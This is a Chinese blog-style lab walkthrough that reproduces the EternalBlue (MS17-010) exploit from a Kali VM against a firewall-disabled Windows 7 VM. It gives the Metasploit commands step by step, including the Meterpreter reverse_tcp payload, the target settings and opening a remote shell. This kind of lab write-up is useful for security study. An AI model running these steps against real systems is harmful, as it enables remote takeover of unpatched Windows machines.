记一次永恒之蓝漏洞复现(MS17-010)

0x00前期准备工作

所需的虚拟机系统
攻击机 Kali Linux (所在网段:192.168.41.132)
受害机 Windows 7(版本号cn_windows_7_professional_with_sp1_x64_dvd_u_677031)(所在网段:192.168.41.133)
注:读者可在MSDN微软中国获得对应的iso.
两台虚拟机采用NAT模式,保证两台虚拟机在同一网段.

0x01Windows 7配置

将win7系统的防火墙全部关闭,保证其足够的“脆弱”.操作大致如下:控制面板–>系统和安全–>更改防火墙配置–>将下图的两个windows防火墙都关闭.
win7的445端口是打开的(默认).
在这里插入图片描述

0x02利用后渗透工具进行攻击

以下操作均在特权模式下实现,将kali打开输入msfconsole启动metasploit.

msfconsole

在这里插入图片描述
输入search命令搜索永恒之蓝漏洞模块.

search ms17-010

在这里插入图片描述
这里我们使用第二个模块,注意因为我已经做过一次实验了,所以默认采用了payload,若第一次做还应该设置payload.

use 2

在这里插入图片描述
若没有上图的提示,则还需要设置payload
使用 reverse_tcp 类型的攻击载荷时,Metasploit 框架会监听指定的 IP 地址和端口,等待目标系统主动与其建立连接。一旦成功建立连接,Metasploit 将向目标系统发送 Meterpreter shell,并与其建立交互式的远程控制会话.

set payload windows/x64/meterpreter/reverse_tcp

接下来输入show options,查看配置的名称,发现Rhosts(受害机ip)是必填的选项,
在这里插入图片描述
输入set rhosts 192.168.41.133进行设置

set rhosts 192.168.41.133

在这里插入图片描述
在完成以上配置后进行漏洞利用run,看到win说明成功.

run

在这里插入图片描述
我们获取对方电脑shell,为防止乱码,我们再输入chcp 65001命令.

shell
chcp 65001

在这里插入图片描述
输入whoami以及其他命令进行测试.
在这里插入图片描述

0x03finish…

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

猿动力

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值